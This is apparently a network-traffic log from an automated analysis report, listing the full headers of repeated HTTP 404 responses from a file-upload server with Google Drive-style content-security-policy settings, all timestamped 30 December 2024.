Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5Niv7rajJGrTVk2ScH1l5KHTDTLOvnRnOEfDh93ot8t9GeKerkxb6unH4fKHGYENVwWOgB8pkContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:41:28 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-c3YciWwH3CbBvpOntigSkg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7EWoyqcqBmq1JhmVipuhMLct6NRJbhE8U9tn0C4PwzCb9KIY74hVhYrf7wqj4oX2uVoDHSMM4Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:41:28 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-e3D5kbhLnjTVnovpVhhGVA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5gV-2YjMFbRndKtgZmIG0EXQStgdKlNke9xxdncz1wMRw3QN4ZS8K7VkOFXLzcDagwcykP-q0Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:41:30 GMTPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-iCPBtgndn7U-OcJzVPPjbg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7qDkGj7h0A9pfgBCCJeCGqeE3DMtV2QJe6G31VnXaAocSuEsNEv7P8R0iqFqWCGHT0BwDV2OgContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:41:31 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-kE0e9hQIvXRv1cQfoXwvgQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC77L_BdOl2OjnmTwDNK_tltpAthRyiWCemZkC6jaJsUMOqJ9Yd_Okw29nEOqXhMTIuIContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:41:31 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-UygpzELVuJL2-soZZuyeLQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6Ba0h2oYwiaQcwZH0UNtR1tKqZuMO5XT19bQ94jTVZ7UUEA5EoYp41QRSb9qSZYbMMyv2zswsContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:41:32 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-g-Zg4pw1-Z0YGhJfj6xOKA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6khCe_X_oQCEGbCmX32iULbtqBZVZhZbFzoV66Y7oB9sLJgzORGtsFxeG3tEt29zAwldotJfMContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:41:34 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-GpYMoAvmqK0IhwUhsHRNGw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5WJunIYLqNKgRhV8ifufrVBsltiAqoSaKnGGI9RAJ-ZZPhBZ0dHmeEQzFKUz-PGw8qjb8a5CcContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:41:35 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-Lj6dxYjfXh8hU8uBbf-gHg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7mghtvx6WSKgy_aneO_pbNj_m5_Ii_Vl9QrM9QGs-YSa8n03vMBAQrTBeP1wnwG8e3Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:41:35 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-6VFVOc0uAVcICla4LR9c6A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4kytxt1FOuhI338g_Rucq6mvnWmHq4z78Ls-gv3ZGsICMA-C5GKDIQ-36VV4OOJsi8FGUyJ8IContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:41:36 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-tp-O6rYIdEnkGxXoGZKhAw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5sPHfFGMBl4PX4gjgUmUyAPG0qdnW6vZTqHTMuFKro5_tVZS40darwz682h_zaxekContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:41:38 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-aOh_c8fxq7wByEsirWqeRg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7d-oAfu8M__vH61_LR2fQDk7wKA8f_hakcEINF5HokGuwBnGl9kVQezpGhqNg_XO5-Vs11gv8Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:41:38 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-075p3ampJeS_8VS-Qgqo-Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6yxRoIe14uZmOtVvRdxH75Qq8cD2mkfmH9ZjvBbu33Vemwmti0xueGSf5h2-3k0gvpContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:41:39 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-NZ4PTiWwGiWc0nHlGEjKCw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC600ejj1bcdxMog52-vn7dK9IibMPzJ-yJPAsTBSNQGb7FCYJlzrYXz-9bao5Q-MjQ0vQUGg44Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:41:39 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-wF1SvxsrY-un_vzEEd7Atw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4-VWxoJC0w5mDpcE4Wpk-GP3yPYX0E2wlYmkZkl7Gu6PPJ0gHidjOCLdS_TH5Ay3KSContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:41:40 GMTPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-IrU2DgpwPLf5z7oHRj56Ig' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC434Tpe3LRzMGiEBQQdeHxBqH474tMTKmu8-nvmxX2WFEB3vMTpLKpN702tSGKw6Xr4cgE25CMContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:41:41 GMTPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-JzDbd9OoYl_Zfelp25Co0A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7EVfhr5JorogN8ZS0CaeeV5ekYmZHDksOctFMgEKJxSsXO3LK4D8R3wXSKYClzDfjovzNqdMAContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:41:42 GMTPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-4Du0vK-dM4K9QQqUWLW6RA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5EM5FQbaT4BnaE5UXD2HQVHrw4T__XFxnbmQrIUJ9Dp74p5s321sZx8-Dl9KFHp2UZfS8-j80Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:41:42 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-NBf-UXn2rjZcfTmHFJejiw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4G03JCKDHc_xLTT3zs8DRgu2WavbFo1b_E9ZbBwdJln9QIyOXZCskgCPovuTaEQE-MContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:41:44 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-vc1FsO6pwRdNQmcnvZXjcg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4JMXh-KtOXQQawajVqXNgbJ0K3W0ktu3bkfFjL5umgtt4K2KxoMQ9rxO-3lCfmjkNICaMmJhIContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:41:44 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-xxm--gHcQxCyLFH9iUGEKw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
